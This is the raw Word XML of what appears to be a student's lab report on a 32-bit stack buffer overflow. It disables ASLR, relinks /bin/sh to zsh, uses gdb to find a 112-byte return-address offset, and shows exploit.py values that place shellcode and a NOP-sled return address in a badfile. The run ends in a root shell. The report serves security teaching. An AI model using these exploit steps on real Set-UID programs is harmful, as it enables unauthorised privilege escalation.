    <w:p w14:paraId="146F422D" w14:textId="77777777" w:rsidR="0004231F" w:rsidRPr="0004231F" w:rsidRDefault="0004231F" w:rsidP="0004231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4231F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036499FE" w14:textId="37FFB450" w:rsidR="004109FF" w:rsidRDefault="004109FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B5379A" w14:textId="5AC8D5A7" w:rsidR="00FA653C" w:rsidRDefault="00FA653C" w:rsidP="00FA653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Turn off Address Space Randomization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6EC7E" w14:textId="77777777" w:rsidR="00FA653C" w:rsidRPr="00FA653C" w:rsidRDefault="00FA653C" w:rsidP="00FA653C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A653C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B94986" w14:textId="77777777" w:rsidR="00FA653C" w:rsidRPr="00FA653C" w:rsidRDefault="00FA653C" w:rsidP="00FA653C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4070736C" w14:textId="77777777" w:rsidR="009675A7" w:rsidRDefault="00FA653C" w:rsidP="00FA653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we can pinpoint the return address easier, since the addresses aren’t changing every time the program is ran.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306AC053" w14:textId="03DF431F" w:rsidR="009675A7" w:rsidRDefault="009675A7" w:rsidP="00FA653C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271E9E95" w14:textId="43951EA1" w:rsidR="009675A7" w:rsidRDefault="009675A7" w:rsidP="009675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Link /bin/sh to zsh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581297F3" w14:textId="77777777" w:rsidR="0090289D" w:rsidRPr="0090289D" w:rsidRDefault="0090289D" w:rsidP="0090289D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89D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>sudo ln -sf /bin/zsh /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4E533" w14:textId="57230C4F" w:rsidR="009675A7" w:rsidRDefault="009675A7" w:rsidP="009675A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769C0EC8" w14:textId="63508D05" w:rsidR="0090289D" w:rsidRDefault="0090289D" w:rsidP="009675A7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we can run a shell in a Set-UID program, since dash &amp; bash have countermeasures against it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EE47E" w14:textId="1BD069ED" w:rsidR="005329C0" w:rsidRDefault="005329C0" w:rsidP="009675A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E81BAE" w14:textId="5D1FB8F1" w:rsidR="005329C0" w:rsidRDefault="005329C0" w:rsidP="005329C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 Makefile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC73FF" w14:textId="69B9FD61" w:rsidR="005329C0" w:rsidRPr="005329C0" w:rsidRDefault="005329C0" w:rsidP="005329C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make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506CFFE" w14:textId="77777777" w:rsidR="005329C0" w:rsidRPr="005329C0" w:rsidRDefault="005329C0" w:rsidP="005329C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50465A96" w14:textId="5CB37317" w:rsidR="004109FF" w:rsidRDefault="00F216BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009675A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0F34E" w14:textId="0D8EE3B4" w:rsidR="0004231F" w:rsidRDefault="00F216BB" w:rsidP="0004231F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F216BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Launching Attack on 32-bit Program (Level 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2395F" w14:textId="5F1FC834" w:rsidR="00F216BB" w:rsidRDefault="00F216BB" w:rsidP="0004231F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615052CC" w14:textId="24ED2E5E" w:rsidR="00F216BB" w:rsidRDefault="00F216BB" w:rsidP="00F216B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Create the badfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA361C0" w14:textId="5E5B4ED0" w:rsidR="00F216BB" w:rsidRPr="00D764E7" w:rsidRDefault="00F216BB" w:rsidP="00F216BB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touch badfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A188EC3" w14:textId="02F3DD92" w:rsidR="00F216BB" w:rsidRDefault="00F216BB" w:rsidP="00F216BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6087CBE8" w14:textId="666380D0" w:rsidR="000D2423" w:rsidRDefault="000D2423" w:rsidP="000D242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Open the debugger for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stack-L1-dbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A187898" w14:textId="7726429C" w:rsidR="000D2423" w:rsidRPr="00D764E7" w:rsidRDefault="000D2423" w:rsidP="000D242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gdb stack-L1-dbg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C875A03" w14:textId="1251A2B4" w:rsidR="000D2423" w:rsidRDefault="000D2423" w:rsidP="000D2423">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DB7F86" w14:textId="5ECB2EBB" w:rsidR="000D2423" w:rsidRDefault="000D2423" w:rsidP="000D242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Set breakpoint at bof():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E00EF" w14:textId="37D95C09" w:rsidR="000D2423" w:rsidRPr="00D764E7" w:rsidRDefault="000D2423" w:rsidP="000D242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$ b bof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CCA19D" w14:textId="212EF5B1" w:rsidR="000D2423" w:rsidRDefault="000D2423" w:rsidP="000D2423">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21944CC3" w14:textId="4F362E88" w:rsidR="00041595" w:rsidRDefault="00041595" w:rsidP="0004159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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D582D61" w14:textId="289B8575" w:rsidR="00041595" w:rsidRPr="00D764E7" w:rsidRDefault="00041595" w:rsidP="00041595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$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3F4EA" w14:textId="0C98D28C" w:rsidR="00041595" w:rsidRDefault="00041595" w:rsidP="00041595">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD1EA52" w14:textId="137A1423" w:rsidR="00EA3C14" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C1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Go next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464671AC" w14:textId="25B4515C" w:rsidR="00EA3C14" w:rsidRPr="00D764E7" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C1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$ next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D632D93" w14:textId="11A200D4" w:rsidR="00EA3C14" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0686A8" w14:textId="20C65DA2" w:rsidR="00EA3C14" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C14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Get the base pointer’s address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024956A" w14:textId="62DB95A4" w:rsidR="00EA3C14" w:rsidRPr="00D764E7" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C1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$ p $ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502D409" w14:textId="3C51246F" w:rsidR="00EA3C14" w:rsidRDefault="00EA3C14" w:rsidP="00EA3C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4710F3F4" w14:textId="77777777" w:rsidR="00BC2EB9" w:rsidRPr="00BC2EB9" w:rsidRDefault="00BC2EB9" w:rsidP="00BC2EB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C2EB9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2E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(void *) 0xffffc9d8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF9CC1" w14:textId="53397D3E" w:rsidR="00BC2EB9" w:rsidRDefault="00BC2EB9" w:rsidP="00EA3C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F868904" w14:textId="29FE9B70" w:rsidR="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904FA9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Get the buffer’s address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E003257" w14:textId="10C8F19E" w:rsidR="00904FA9" w:rsidRPr="00D764E7" w:rsidRDefault="00904FA9" w:rsidP="00904FA9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$ p &amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DDB0D" w14:textId="07E9E75C" w:rsidR="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904FA9"/>
    <w:p w14:paraId="3F7DC546" w14:textId="5705D5E9" w:rsidR="00904FA9" w:rsidRPr="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904F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4FA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r w:rsidRPr="00904FA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(char (*)[100]) 0xffffc96c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A84D7" w14:textId="55D50612" w:rsidR="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6856CB4F" w14:textId="33A0372A" w:rsidR="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904FA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Calculate the difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24710FEA" w14:textId="5C97B697" w:rsidR="00904FA9" w:rsidRDefault="00904FA9" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>c9d8 – c96c = 6c (108)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344A894" w14:textId="3C041AEB" w:rsidR="000176CD" w:rsidRDefault="000176CD" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6982CE75" w14:textId="5622443C" w:rsidR="009D71F3" w:rsidRDefault="000176CD" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>This means that, for the 32-bit version, the eip is at a difference of 112, being an address space higher than the ebp</w:t>
      </w:r>
      <w:r w:rsidR="009D71F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007A20C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the offset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA096F3" w14:textId="345DBDA4" w:rsidR="007A20C7" w:rsidRPr="007A20C7" w:rsidRDefault="007A20C7" w:rsidP="007A20C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 xml:space="preserve">offset </w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3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color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0701ECB6" w14:textId="275A439A" w:rsidR="009D71F3" w:rsidRDefault="009D71F3" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE0381F" w14:textId="4AB39E41" w:rsidR="001809F2" w:rsidRDefault="008E0C26" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>We want to put the shellcode is at the end of the</w:t>
      </w:r>
      <w:r w:rsidR="003D55ED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> overflown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buffer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we have more room to jump around with the return address, so the start is the buffer size minus the shellcode size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAD30F" w14:textId="77777777" w:rsidR="003D55ED" w:rsidRPr="009D71F3" w:rsidRDefault="003D55ED" w:rsidP="003D55ED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 xml:space="preserve">start </w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3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color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>516</w:t>
      </w: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color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0A10B" w14:textId="584EED8D" w:rsidR="008E0C26" w:rsidRDefault="008E0C26" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372E0C2B" w14:textId="6AD2806A" w:rsidR="001809F2" w:rsidRDefault="007A20C7" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>The return value could’ve been anywhere between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28956256" w14:textId="5CAA78A3" w:rsidR="007A20C7" w:rsidRDefault="008276DB" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">eip's address + a few addresses &amp; eip’s address + start </w:t>
      </w:r>
      <w:r w:rsidR="008D3619">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset</w:t>
      </w:r>
      <w:r w:rsidR="008D3619">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2F83C" w14:textId="75217906" w:rsidR="008D3619" w:rsidRDefault="008D3619" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>a range full of NOPs</w:t>
      </w:r>
      <w:r w:rsidR="000619FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33401A0D" w14:textId="3402026F" w:rsidR="001809F2" w:rsidRDefault="000619FF" w:rsidP="00904FA9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But because of running the program </w:t>
      </w:r>
      <w:r w:rsidR="00D764E7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> gbd</w:t>
      </w:r>
      <w:r w:rsidR="00D764E7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>, the higher addresses get populated by gdb’s environment data, so the actual return address range is higher than its debug counterpart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18764A4E" w14:textId="0D0D5C85" w:rsidR="001809F2" w:rsidRDefault="001809F2" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BD061A" w14:textId="77777777" w:rsidR="001809F2" w:rsidRDefault="001809F2" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EA338D" w14:textId="29EE0C68" w:rsidR="009D71F3" w:rsidRDefault="009D71F3" w:rsidP="009D71F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>exploit.py values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C204A43" w14:textId="26538738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#################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDB7DF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# Put the shellcode somewhere in the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78139D15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start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516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-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len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(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E1BE0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content[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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start:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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start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+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len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(shellcode)]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shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380033EC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AD4AC83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 xml:space="preserve"># Decide the return address value </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB1E3E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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> put it somewhere in the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F405B8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ret    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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3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ffffca90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#0xffffcb50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C2B7A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offset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112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CB3AD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0635AAD9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L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D71F3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4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    </w:t>
      </w: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# Use 4 for 32-bit address and 8 for 64-bit address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E806BF" w14:textId="77777777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content[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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offset:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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offset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+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L] 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(ret).</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F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to_bytes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(L,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3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byteorder</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71F3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D71F3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'little'</w:t>
      </w:r>
      <w:r w:rsidRPr="009D71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</w:p>
    <w:p w14:paraId="0757A4E8" w14:textId="199FE652" w:rsidR="009D71F3" w:rsidRPr="009D71F3" w:rsidRDefault="009D71F3" w:rsidP="009D71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D71F3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#################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC27ED" w14:textId="6CB55945" w:rsidR="009D71F3" w:rsidRDefault="009D71F3" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042E974B" w14:textId="4C0537DE" w:rsidR="0085427D" w:rsidRPr="0085427D" w:rsidRDefault="0085427D" w:rsidP="0085427D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Run </w:t>
      </w:r>
      <w:r w:rsidRPr="0085427D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidRPr="0085427D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate badfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F89FEE" w14:textId="45D08C76" w:rsidR="0085427D" w:rsidRPr="0085427D" w:rsidRDefault="0085427D" w:rsidP="0085427D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python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5E7AA" w14:textId="77777777" w:rsidR="0085427D" w:rsidRDefault="0085427D" w:rsidP="00904FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226FEFC1" w14:textId="44EB523D" w:rsidR="00D764E7" w:rsidRDefault="00D764E7" w:rsidP="00D764E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Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stack-L1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67CEE8" w14:textId="45796FD9" w:rsidR="00D764E7" w:rsidRPr="00D764E7" w:rsidRDefault="00D764E7" w:rsidP="00D764E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764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./stack-L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF9CAD" w14:textId="5EC4C24E" w:rsidR="00D764E7" w:rsidRDefault="00D764E7" w:rsidP="00D764E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D3DCA7" w14:textId="5F37ED79" w:rsidR="00D764E7" w:rsidRDefault="00D764E7" w:rsidP="00D764E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Input size: 517</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E1DA2" w14:textId="6FE3D885" w:rsidR="00D764E7" w:rsidRPr="009D71F3" w:rsidRDefault="00D764E7" w:rsidP="00D764E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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F0872" w14:textId="3001B299" w:rsidR="00D764E7" w:rsidRDefault="00D764E7" w:rsidP="00D764E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2D626F" w14:textId="35A0BD67" w:rsidR="0067560B" w:rsidRPr="00D764E7" w:rsidRDefault="0067560B" w:rsidP="00D764E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>The # meaning we have a shell with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0067560B" w:rsidRPr="00D764E7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C83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E30E5108"/>
    <w:lvl w:ilvl="0" w:tplc="DDA0F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18"/>
    <w:rsid w:val="000176CD"/>
    <w:rsid w:val="00041595"/>
    <w:rsid w:val="0004231F"/>
    <w:rsid w:val="000619FF"/>
    <w:rsid w:val="000D2423"/>
    <w:rsid w:val="000D7EF3"/>
    <w:rsid w:val="001809F2"/>
    <w:rsid w:val="00200AFA"/>
    <w:rsid w:val="002D0C8F"/>
    <w:rsid w:val="00334B13"/>
    <w:rsid w:val="00347518"/>
    <w:rsid w:val="003A589B"/>
    <w:rsid w:val="003C6CBA"/>
    <w:rsid w:val="003D55ED"/>
    <w:rsid w:val="004109FF"/>
    <w:rsid w:val="005329C0"/>
    <w:rsid w:val="0067560B"/>
    <w:rsid w:val="0072535F"/>
    <w:rsid w:val="0074404C"/>
    <w:rsid w:val="00744078"/>
    <w:rsid w:val="007A20C7"/>
    <w:rsid w:val="008276DB"/>
    <w:rsid w:val="0085427D"/>
    <w:rsid w:val="008D3619"/>
    <w:rsid w:val="008E0C26"/>
    <w:rsid w:val="0090289D"/>
    <w:rsid w:val="00904FA9"/>
    <w:rsid w:val="009675A7"/>
    <w:rsid w:val="009D71F3"/>
    <w:rsid w:val="009F153C"/>
    <w:rsid w:val="00A409FA"/>
    <w:rsid w:val="00B00F79"/>
    <w:rsid w:val="00B92FC5"/>
    <w:rsid w:val="00BB6427"/>
    <w:rsid w:val="00BC2EB9"/>
    <w:rsid w:val="00BF20FB"/>
    <w:rsid w:val="00C17DD1"/>
    <w:rsid w:val="00CB2451"/>
    <w:rsid w:val="00D20DE1"/>
    <w:rsid w:val="00D764E7"/>
    <w:rsid w:val="00DD1BAE"/>
    <w:rsid w:val="00EA3C14"/>
    <w:rsid w:val="00EC5D21"/>
    <w:rsid w:val="00F216BB"/>
    <w:rsid w:val="00F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12525"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
